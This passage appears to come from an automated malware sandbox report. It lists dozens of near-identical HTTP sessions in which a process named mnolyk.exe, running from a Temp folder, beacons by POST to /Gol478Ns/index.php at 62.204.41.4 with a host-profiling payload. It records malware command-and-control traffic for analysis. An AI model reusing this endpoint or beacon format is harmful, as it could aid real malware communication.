                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      351192.168.2.75004662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:37.701236963 CET466OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.763130903 CET466INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      352192.168.2.75004762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:37.932300091 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.994133949 CET467INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      353192.168.2.75004862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:38.164092064 CET468OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.228632927 CET468INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      354192.168.2.75004962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:38.401505947 CET469OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.466819048 CET469INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      355192.168.2.75005062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:38.652718067 CET470OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.718818903 CET470INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      356192.168.2.75005162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:38.908724070 CET471OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:38.970972061 CET471INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      357192.168.2.75005262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:39.150059938 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.214437008 CET472INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      358192.168.2.75005362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:39.384368896 CET473OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.449167967 CET473INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      359192.168.2.75005462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:39.617227077 CET474OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.679996967 CET474INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      36192.168.2.74973062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:10.313178062 CET140OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.379033089 CET140INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      360192.168.2.75005562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:39.857527018 CET475OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:39.919043064 CET475INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      361192.168.2.75005662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:40.088529110 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.152849913 CET476INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      362192.168.2.75005762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:40.336370945 CET477OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.399558067 CET477INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      363192.168.2.75005862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:40.571513891 CET478OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.634928942 CET478INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      364192.168.2.75005962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:40.814145088 CET479OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:40.878601074 CET479INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      365192.168.2.75006062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:41.073046923 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.137222052 CET480INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      366192.168.2.75006162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:41.341686964 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.406538963 CET481INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      367192.168.2.75006262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:41.588090897 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.653572083 CET482INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      368192.168.2.75006362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:41.843312979 CET483OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.907038927 CET483INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      369192.168.2.75006462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:42.089378119 CET484OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
